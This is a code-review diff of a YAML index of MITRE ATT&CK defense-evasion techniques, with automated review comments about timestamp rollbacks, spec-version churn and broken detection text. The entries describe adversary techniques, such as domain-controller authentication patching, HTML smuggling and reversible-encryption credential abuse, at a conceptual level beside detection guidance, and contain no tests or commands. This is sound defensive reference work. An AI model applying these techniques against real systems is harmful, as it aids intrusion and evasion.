+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
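Review bot: the `x_mitre_permissions_required: - User` block is dropped from T1578.002 in this hunk with nothing replacing it, so any consumer that filters techniques by required privilege loses the only privilege hint this entry carried. The same block disappears from T1556.001 and T1556.005 further down this patch, yet T1601.001, T1221 and T1564.005 keep theirs, so the removal is not applied consistently; if the field is gone from the 3.2.0 attack spec that the rewritten entries now declare, the generator should drop it everywhere and the commit message should say so. Separately, the carried-over `x_mitre_detection` text still contains the line breaks left where inline code markup was stripped (`RunInstances` / `event`, and `gcloud compute instances create` / `to create a VM`), which is valid YAML but turns the detection guidance into broken sentences; joining those fragments in the generator would help anyone reading the field.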
@@ -11837,7 +12092,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
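Review bot: the `modified` timestamp for T1055.009 goes backwards in this hunk, from 2021-04-29 to 2020-06-20, while T1578.002 above moves forward to 2024-09-30. A regenerated index should not roll an object's modification time back, and the pattern here (older `modified`, `x_mitre_attack_spec_version: 2.1.0` removed rather than bumped to 3.2.0) recurs for several entries in this file, which suggests the generator is merging objects from two different ATT&CK bundle versions. Worth confirming which source bundle each entry came from before this is merged.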
@@ -11880,8 +12135,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
@@ -11928,7 +12181,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11994,12 +12247,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12054,33 +12305,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
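Review bot: the new T1036.010 entry is added with `x_mitre_detection: ''` and `atomic_tests: []`, so the index gains a technique with neither detection guidance nor a test; since the only data source listed is 'User Account: User Account Creation', the commit message should state that this is a pass-through of the upstream object, so readers do not mistake the empty field for a generation failure. Interleaving the new entry with a full key reorder of the neighbouring T1556.001 object (its old `x_mitre_platforms`, `id`, `created` and `external_references` lines are removed here and re-emitted further down) also makes this hunk hard to review; emitting keys in a stable order in the generator would keep future diffs limited to actual data changes.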
@@ -12101,6 +12403,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12115,22 +12418,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12188,48 +12511,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12251,6 +12543,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12261,23 +12554,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
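Review bot: the `x_mitre_detection` context at the top of this hunk still carries stray line breaks where inline code markup was stripped (`Set-ADUser` / `and Set-ADAccountControl` / `,`), so the cmdlet names a detection engineer would copy out of this field are split across lines; since the generator is already rewriting the whole T1556.005 object here (references reordered, `x_mitre_permissions_required` removed, spec bumped to 3.2.0), this is the place to normalize that text. The reference reorder itself (`dump_pwd_dcsync` now listed first, `external_id` moved after `url`) is pure churn that a stable emission order would avoid.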
@@ -12318,8 +12638,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12355,43 +12676,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
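Review bot: `name` for T1070.004 is re-emitted in this hunk as 'Indicator Removal on Host: File Deletion' even though the object's `modified` jumps to 2024-10-15; ATT&CK renamed the parent T1070 from "Indicator Removal on Host" to "Indicator Removal" in v12 (October 2022), so a 2024-dated object would be expected to carry the newer parent name. Worth checking whether the generator takes this name from the STIX object or from a local technique-name mapping that needs refreshing. The carried-over description also keeps the split lines around `del` / `on Windows and rm` / `or unlink` from stripped inline-code markup.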
@@ -12402,18 +12703,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
@@ -12475,7 +12794,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
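Review bot: `modified` for T1221 rolls back from 2022-05-11 to 2022-01-12 in this hunk, the same backwards-timestamp pattern seen for T1055.009, T1601.001 and T1070.009 earlier in this patch; if 2022-01-12 is the object's real `modified` and 2022-05-11 was a bundle-level date, the commit message should say so. Unrelated to this change, the carried-over description reads "ZIP archives compromised of various XML files" where "comprised of" is meant; that is upstream text, so it should be fixed in the source rather than patched in the index.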
@@ -12505,13 +12824,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12608,7 +12925,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
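Review bot: this hunk drops `spec_version: '2.1'` from T1134, as the patch does for every object in the file. `spec_version` is the STIX 2.1 object-level property, distinct from `x_mitre_attack_spec_version`, so after this change the index entries are no longer complete STIX 2.1 objects on their own; that is fine if the index is only consumed as YAML by this repository's own scripts, but it deserves one line in the commit message, because the removal is not mentioned anywhere and is the one change applied uniformly to every entry.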
@@ -12671,7 +12987,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12709,7 +13024,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12736,8 +13051,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12765,7 +13078,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12809,8 +13122,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12865,7 +13176,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
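Review bot: for T1622 the `modified` rolls back from 2022-05-11 to 2022-04-16 in this hunk, and in the following hunk `x_mitre_attack_spec_version` is left at 2.1.0 while the entries rewritten elsewhere in this patch declare 3.2.0, which is consistent with this object having been taken from an older bundle than its neighbours. The carried-over description also keeps the split lines around `IsDebuggerPresent()` / `and NtQueryInformationProcess()` / `, or manually checking the BeingDebugged` left by stripped inline-code markup, so the API names in the detection-relevant text do not read as one sentence.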
@@ -12885,7 +13196,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -12935,7 +13245,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -12990,12 +13299,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13045,12 +13353,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
